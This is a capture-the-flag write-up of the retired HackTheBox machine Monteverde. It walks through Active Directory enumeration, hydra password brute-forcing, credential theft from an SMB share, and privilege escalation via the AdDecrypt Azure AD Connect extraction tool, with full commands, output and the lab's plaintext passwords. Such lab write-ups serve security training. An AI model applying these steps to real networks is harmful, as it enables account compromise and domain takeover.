HTB-writeups

Writeups of HackTheBox retired machines


Project maintained by flast101 Hosted on GitHub Pages — Theme by mattgraham

<– Back

Monteverde


1- Overview

card
Retire: 13 June 2020
Writeup: 13 June 2020

Summary

2- Enumeration
2.1- nmap scan
2.2- Active Directory Enumeration

3- Exploitation
3.1- Bruteforcing Credentials
3.2- SMB Shares
3.3- Identifying Another Account
3.4- Getting user.txt

4- Privilege Escalation
4.1- Post-Compromise Enumeration
4.2- Post-Compromise Exploitation


2- Enumeration

2.1- nmap scan

First things first, we begin with a nmap scan:

root@kali:~# nmap --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.172

Nmap scan report for 10.10.10.172
Host is up, received user-set (0.045s latency).
Scanned at 2020-05-30 20:11:08 CEST for 1318s
Not shown: 65516 filtered ports
Reason: 65516 no-responses

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain?       syn-ack ttl 127
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-30 17:31:50Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49706/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49778/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=5/30%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5ED2A6E2%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10B%TI=RD%II=I%TS=U)
SEQ(SP=106%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=U)
OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M54DNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -50m37s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 24865/tcp): CLEAN (Timeout)
|   Check 2 (port 2859/tcp): CLEAN (Timeout)
|   Check 3 (port 47166/udp): CLEAN (Timeout)
|   Check 4 (port 10279/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-30T17:39:52
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   31.32 ms 10.10.14.1
2   31.42 ms 10.10.10.172

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 30 20:33:06 2020 -- 1 IP address (1 host up) scanned in 1318.40 seconds

The important services we found here are : DNS, RPC, SMB, Kerberos, and LDAP. There is obviously an Active Directory.

2.2- Active Directory Enumeration

Let’s begin with using ldapsearch to grab general information:

root@kali:~# ldapsearch -h 10.10.10.172 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#

#
dn:
namingcontexts: DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

The box is monteverde.megabank.local and its domain name is megabank.local.

Let’s try to find informations about users.

root@kali:~# ldapsearch -h 10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL" '(objectClass=User)' sAMAccountName | grep sAMAccountName

# requesting: sAMAccountName
sAMAccountName: Guest
sAMAccountName: MONTEVERDE$
sAMAccountName: AAD_987d7f2f57d2
sAMAccountName: mhope
sAMAccountName: SABatchJobs
sAMAccountName: svc-ata
sAMAccountName: svc-bexec
sAMAccountName: svc-netapp
sAMAccountName: dgalanos
sAMAccountName: roleary
sAMAccountName: smorgan

3- Exploitation

3.1- Bruteforcing Credentials

We can try to bruteforce credentials using a list of users and crackmapexec or hydra.
However, this is risky as our machine might get banned if the target has an Account Lockout Threshold set. We should first check the password policy:

root@kali:~# crackmapexec smb 10.10.10.172 --pass-pol

SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] Dumping password info for domain: MEGABANK
SMB         10.10.10.172    445    MONTEVERDE       Minimum password length: 7
SMB         10.10.10.172    445    MONTEVERDE       Password history length: 24
SMB         10.10.10.172    445    MONTEVERDE       Maximum password age:
SMB         10.10.10.172    445    MONTEVERDE       
SMB         10.10.10.172    445    MONTEVERDE       Password Complexity Flags: 000000
SMB         10.10.10.172    445    MONTEVERDE       	Domain Refuse Password Change: 0
SMB         10.10.10.172    445    MONTEVERDE       	Domain Password Store Cleartext: 0
SMB         10.10.10.172    445    MONTEVERDE       	Domain Password Lockout Admins: 0
SMB         10.10.10.172    445    MONTEVERDE       	Domain Password No Clear Change: 0
SMB         10.10.10.172    445    MONTEVERDE       	Domain Password No Anon Change: 0
SMB         10.10.10.172    445    MONTEVERDE       	Domain Password Complex: 0
SMB         10.10.10.172    445    MONTEVERDE       
SMB         10.10.10.172    445    MONTEVERDE       Minimum password age:
SMB         10.10.10.172    445    MONTEVERDE       Reset Account Lockout Counter: 30 minutes
SMB         10.10.10.172    445    MONTEVERDE       Locked Account Duration: 30 minutes
SMB         10.10.10.172    445    MONTEVERDE       Account Lockout Threshold: None
SMB         10.10.10.172    445    MONTEVERDE       Forced Log off Time: Not Set

We can see the “Account Lockout Threshold: None”. So we can try to bruteforce the credentials without risk:

root@kali:~# hydra -L users.txt -P "/usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100.txt" -e nsr -s 389 ldap2://10.10.10.172

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-01 07:56:51
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1030 login tries (l:10/p:103), ~65 tries per task
[DATA] attacking ldap2://10.10.10.172:389/
[389][ldap2] host: 10.10.10.172   login: MONTEVERDE$
[389][ldap2] host: 10.10.10.172   login: AAD_987d7f2f57d2
[389][ldap2] host: 10.10.10.172   login: mhope
[389][ldap2] host: 10.10.10.172   login: SABatchJobs
[389][ldap2] host: 10.10.10.172   login: SABatchJobs   password: SABatchJobs
[389][ldap2] host: 10.10.10.172   login: svc-ata
[389][ldap2] host: 10.10.10.172   login: svc-bexec
[389][ldap2] host: 10.10.10.172   login: svc-netapp
[389][ldap2] host: 10.10.10.172   login: dgalanos
[389][ldap2] host: 10.10.10.172   login: roleary
[389][ldap2] host: 10.10.10.172   login: smorgan
1 of 1 target successfully completed, 11 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-01 07:56:53

3.2- SMB Shares

We have valid credentials “SABatchJobs:SABatchJobs”. However, it doesn’t work when we try to login using Evil-WinRM:

root@kali:~# evil-winrm -i 10.10.10.172 -u SABatchJobs -p SABatchJobs

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1

Let’s try to find shares with smbclient:

root@kali:~# smbclient -U SABatchJobs -L //10.10.10.172
Enter WORKGROUP\SABatchJobs's password:
Domain=[MEGABANK] OS=[] Server=[]

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	azure_uploads   Disk      
	C$              Disk      Default share
	E$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
	users$          Disk    
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Now, we can browse or download the shares content. Unless the size is really huge, I usually prefer to download the full content and then browse the shares locally:

root@kali:~# smbclient //10.10.10.172/users$ -U SABatchJobs

Enter WORKGROUP\SABatchJobs's password:
Domain=[MEGABANK] OS=[] Server=[]
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 14:12:48 2020
  ..                                  D        0  Fri Jan  3 14:12:48 2020
  dgalanos                            D        0  Fri Jan  3 14:12:30 2020
  mhope                               D        0  Fri Jan  3 14:41:18 2020
  roleary                             D        0  Fri Jan  3 14:10:30 2020
  smorgan                             D        0  Fri Jan  3 14:10:24 2020

		524031 blocks of size 4096. 519955 blocks available

smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \mhope\azure.xml of size 1212 as azure.xml (9,5 KiloBytes/sec) (average 9,5 KiloBytes/sec)
smb: \> exit

Looking at the files we have downloaded, it seems that a file named “azure.xml” can be interesting:

root@kali:~# cat mhope/azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

The line N=”Password”>4n0therD4y@n0th3r$ might be helpfull.

3.3- Identifying Another Account

We found a new password and we want to be able to login in the target. We will use crackmapexec to find out wich user it is the password:

root@kali:~# crackmapexec smb 10.10.10.172 -u users.txt -p 4n0therD4y@n0th3r$
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\MONTEVERDE$:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$

Our happy winner is mhope !

3.4- Getting user.txt

We have new credentials mhope:4n0therD4y@n0th3r$. What can we do with them ? Let’s try to login with Evil-WinRM:

user.txt


4- Privilege Escalation

4.1- Post-Compromise Enumeration

We must gather more information about our user mhope:

*Evil-WinRM* PS C:\Users\mhope\desktop> whoami /all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Interesting to notice that mhope is member of the “Azure Admins” group and we found its credentials in the “azure.xml” file.

If we google the words “Azure Admins privesc”, we find several links. One of those was released by one of our famous active members VbScrub:
Azure AD Connect Database Exploit (Priv Esc): https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/

This article also reveals this interesting Github repo:
Azure AD Connect password extraction: https://github.com/fox-it/adconnectdump

4.2- Post-Compromise Exploitation

Let’s try it.
We download AdDecrypt.exe and mcrypt.dll on the target. As indicated, these two files must be placed in the directory where we will launch the exploit. Once done, we have:

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> Dir -Force C:\Users\mhope\Documents\

    Directory: C:\Users\mhope\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hsl         1/3/2020   5:24 AM                My Music
d--hsl         1/3/2020   5:24 AM                My Pictures
d--hsl         1/3/2020   5:24 AM                My Videos
d-----        5/31/2020  11:37 PM                WindowsPowerShell
-a----        5/31/2020  11:13 PM          10866 20200531231329_BloodHound.zip
-a----        5/31/2020  11:56 PM          14848 AdDecrypt.exe
-a-hs-         1/3/2020   5:24 AM            402 desktop.ini
-a----        5/31/2020  11:57 PM         334248 mcrypt.dll
-a----        5/31/2020  11:13 PM          15037 MmU4ODNmNTctYjM2MS00N2U1LWI5NjctNDg2N2E5YmZmZmEx.bin
-a----        5/31/2020  11:22 PM          59392 nc.exe
-a----        5/31/2020  11:37 PM          90794 powerzure.ps1
-a----        5/31/2020  11:13 PM         972875 sharphound.ps1

Notice that I first tried BloodHound, but unsuccessfully…

And now, this is time for execution. We must execute the exploit in the directory “C:\Program Files\Microsoft Azure AD Sync\Bin”, and it works fine: AdDecrypt

We finally have our Administrator credentials “administrator:xxxxxxxxxxxxxxxx”. We just have to login as Administrator and it is done:

root.txt

Be Curious, Learning is Life !

<– Back